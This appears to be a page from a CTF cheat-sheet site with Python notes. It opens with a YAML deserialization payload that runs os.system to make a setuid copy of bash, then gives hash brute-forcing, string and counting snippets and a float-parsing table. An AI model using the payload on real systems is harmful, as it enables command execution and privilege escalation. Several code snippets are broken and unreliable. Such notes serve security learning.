PYTHON

Vulnerability

  • Load yaml

    • !!python/object/new:os.system [cp /bin/bash /tmp/bash;chmod u+s /tmp/bash]
!!python/object/new:os.system [<RUN COMMAND IN HERE>]

Technique

  • Find hex from a specific known SHA value in SHA256

    • Using hashlib

    import hashlib
import random

h=None
while(h is None or h[-5:]!='512bf'):
    p=random.randrange(1, 0xffffffffffffffffffffffff)
    h=hashlib.sha256(p.to_bytes(12, 'big')).hexdigest()

print('SHA256(' + hex(p) + ')=' + h)

    • Using pwntools

    from pwn import *
pwnlib.util.iters.mbruteforce(lambda x: hashlib.sha256(x).hexdigest()[-5:] == hash , string.ascii_lowercase, length = 10)

  • Read file

# Read and decode hex
output = open("output.txt","r").read().decode('hex')

  • Get printable strings

import string

# Uppercase ['A','B',...]
UPPER = list(string.ascii_uppercase)

# Lowercase['a','b',...]
LOWER = list(string.ascii_lowercase)

# All ASCII 
ALL = list(string.printable)

  • Shuffle strings

import random

TEMP = "abcdefg"
random.shuffle(TEMP)

  • Counter Library

from collections import Counter, OrderedDict

freq = Counter("abbbccccdd")

# Sorted By Descending Order
sorted(freq.items(), key=lambda i: i[1], reverse=True)
# => Output = ('c', 4), ('b', 3), ('d', 2), ('a', 1)]

Conversion

#Binary to hex
dec_str2 = format(int('0100010000'), 2),'x')
dec_str2.rjust(4,'0')
print(dec_str2)

String to Float/Int

val                   is_float(val) Note
--------------------  ----------   --------------------------------
""                    False        Blank string
"127"                 True         Passed string
True                  True         Pure sweet Truth
"True"                False        Vile contemptible lie
False                 True         So false it becomes true
"123.456"             True         Decimal
"      -127    "      True         Spaces trimmed
"\t\n12\r\n"          True         whitespace ignored
"NaN"                 True         Not a number
"NaNanananaBATMAN"    False        I am Batman
"-iNF"                True         Negative infinity
"123.E4"              True         Exponential notation
".1"                  True         mantissa only
"1,234"               False        Commas gtfo
u'\x30'               True         Unicode is fine.
"NULL"                False        Null is not special
0x3fade               True         Hexadecimal
"6e7777777777777"     True         Shrunk to infinity
"1.797693e+308"       True         This is max value
"infinity"            True         Same as inf
"infinityandBEYOND"   False        Extra characters wreck it
"12.34.56"            False        Only one dot allowed
u'四'                 False        Japanese '4' is not a float.
"#56"                 False        Pound sign
"56%"                 False        Percent of what?
"0E0"                 True         Exponential, move dot 0 places
0**0                  True         0___0  Exponentiation
"-5e-5"               True         Raise to a negative number
"+1e1"                True         Plus is OK with exponent
"+1e1^5"              False        Fancy exponent not interpreted
"+1e1.3"              False        No decimals in exponent
"-+1"                 False        Make up your mind
"(1)"                 False        Parenthesis is bad

References

PreviousBASHNextJAVASCRIPT

Last updated